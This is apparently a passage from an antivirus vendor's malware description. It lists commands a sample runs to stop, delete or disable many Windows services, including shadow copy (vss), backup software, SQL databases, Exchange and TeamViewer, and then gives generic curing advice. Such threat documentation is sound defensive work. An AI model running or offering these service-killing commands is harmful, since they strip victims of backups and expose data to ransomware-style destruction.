  • '<SYSTEM32>\sc.exe' delete VirboxWebServer
  • '<SYSTEM32>\net1.exe' stop "MsDtsServer100"
  • '<SYSTEM32>\net1.exe' stop MSSQL$VIM_SQLEXP
  • '<SYSTEM32>\net1.exe' stop AutoUpdateService
  • '<SYSTEM32>\net1.exe' stop AdobeARMservice
  • '<SYSTEM32>\net1.exe' stop MSExchangeHM
  • '<SYSTEM32>\sc.exe' delete Protect_2345Explorer
  • '<SYSTEM32>\sc.exe' delete vsvnjobsvc
  • '<SYSTEM32>\sc.exe' delete smtpsvrJT
  • '<SYSTEM32>\sc.exe' delete TPlusStdUpgradeService1300
  • '<SYSTEM32>\sc.exe' delete btPanel
  • '<SYSTEM32>\sc.exe' delete MotionBoardRCService57
  • '<SYSTEM32>\sc.exe' delete MSMQ
  • '<SYSTEM32>\sc.exe' delete TPlusStdTaskService1300
  • '<SYSTEM32>\sc.exe' config SQLANYs_Sage_FAS_Fixed_Assets start=disabled
  • '<SYSTEM32>\net1.exe' stop "MSSQLServerOLAPService"
  • '<SYSTEM32>\net1.exe' stop CASWebServer
  • '<SYSTEM32>\net1.exe' stop FirebirdServerDefaultInstance
  • '<SYSTEM32>\net1.exe' stop MSExchangeFrontEndTransport
  • '<SYSTEM32>\sc.exe' delete TPlusStdAppService1300
  • '<SYSTEM32>\sc.exe' delete FTA
  • '<SYSTEM32>\net1.exe' stop SBOWFDataAccess
  • '<SYSTEM32>\net1.exe' stop MSExchangeDiagnostics
  • '<SYSTEM32>\sc.exe' delete ReportServer
  • '<SYSTEM32>\sc.exe' delete "Flash Helper Service"
  • '<SYSTEM32>\net1.exe' stop VMnetDHCP
  • '<SYSTEM32>\net1.exe' stop FirebirdGuardianDeafaultInstance
  • '<SYSTEM32>\net1.exe' stop MSExchangeCompliance
  • '<SYSTEM32>\net1.exe' stop "NetBackup Legacy Network Service"
  • '<SYSTEM32>\sc.exe' delete qemu-ga
  • '<SYSTEM32>\sc.exe' delete SPAdminV4
  • '<SYSTEM32>\sc.exe' delete VMUSBArbService
  • '<SYSTEM32>\sc.exe' delete TeamViewer
  • '<SYSTEM32>\sc.exe' config vss start=disabled
  • '<SYSTEM32>\sc.exe' delete SPSearchHostController
  • '<SYSTEM32>\net1.exe' stop "MSSQL$VEEAMSQL2012"
  • '<SYSTEM32>\sc.exe' config "MSSQL$PROGID" start= disabled
  • '<SYSTEM32>\net1.exe' stop "NetBackup Legacy Client Service"
  • '<SYSTEM32>\net1.exe' stop MSExchangeAntispamUpdate
  • '<SYSTEM32>\net1.exe' stop DellDRLogSvc
  • '<SYSTEM32>\net1.exe' stop mysqltransport
  • '<SYSTEM32>\sc.exe' delete VMAuthdService
  • '<SYSTEM32>\sc.exe' delete ProjectQueueService16
  • '<SYSTEM32>\sc.exe' delete wwbizsrv
  • '<SYSTEM32>\sc.exe' delete MSDTC
  • '<SYSTEM32>\net1.exe' stop vss
  • '<SYSTEM32>\sc.exe' config "TMBMServer" start= disabled
  • '<SYSTEM32>\sc.exe' delete "wanxiao-monitor"
  • '<SYSTEM32>\sc.exe' delete allpass_redisservice_port21160
  • '<SYSTEM32>\sc.exe' delete AlibabaProtect
  • '<SYSTEM32>\sc.exe' delete VMwareHostd
  • '<SYSTEM32>\net1.exe' stop SQLWriter
  • '<SYSTEM32>\sc.exe' config vmvss start=disabled
  • '<SYSTEM32>\sc.exe' delete SPTraceV4
  • '<SYSTEM32>\net1.exe' stop MSSQL$FE_EXPRESS
  • '<SYSTEM32>\sc.exe' delete MMRHookService
  • '<SYSTEM32>\sc.exe' delete OSearch16
  • '<SYSTEM32>\sc.exe' delete OpenSSHd
  • '<SYSTEM32>\sc.exe' delete "Sense Shield Service"
  • '<SYSTEM32>\net1.exe' stop vmvss
  • '<SYSTEM32>\net1.exe' stop "MSSQL"
  • '<SYSTEM32>\net1.exe' stop Tomcat8
  • '<SYSTEM32>\net1.exe' stop JWRinfoClientService
  • '<SYSTEM32>\net1.exe' stop MSExchangeDelivery
  • '<SYSTEM32>\net1.exe' stop "NetBackup SAN Client Fibre Transport Service"
  • '<SYSTEM32>\sc.exe' delete kbasesrv
  • '<SYSTEM32>\sc.exe' delete VmAgentDaemon
  • '<SYSTEM32>\sc.exe' delete "Kiwi Syslog Server"
  • '<SYSTEM32>\sc.exe' delete "AHS SERVICE"
  • '<SYSTEM32>\sc.exe' delete "UWS HiPriv Services"
  • '<SYSTEM32>\sc.exe' config SQLWriter start=disabled
  • '<SYSTEM32>\sc.exe' delete ZTEVdservice
  • '<SYSTEM32>\sc.exe' delete SPTimerV4
  • '<SYSTEM32>\sc.exe' delete "vm-agent"
  • '<SYSTEM32>\sc.exe' delete RabbitMQ
  • '<SYSTEM32>\net1.exe' stop "VMware NAT Service"
  • '<SYSTEM32>\net1.exe' stop JWEM3DBAUTORun
  • '<SYSTEM32>\net1.exe' stop MSExchangeDagMgmt
  • '<SYSTEM32>\net1.exe' stop "NetBackup Proxy Service"
  • '<SYSTEM32>\net1.exe' stop "SQLAgent$VEEAMSQL2012"
  • '<SYSTEM32>\net1.exe' stop TeamViewer
  • '<SYSTEM32>\net1.exe' stop SBOWorkflowEngine

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and of any removable media you use.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk, mount it on a USB drive or burn it to a CD/DVD. After booting from this media, run a full scan and cure all the detected threats.

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow the recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you see some other announcement that prevents you from using the handheld normally), do the following:
    • Boot your smartphone or tablet into safe mode (depending on the operating system version and the specifications of the particular mobile device, this procedure can be performed in various ways; consult the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install Dr.Web for Android on the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.
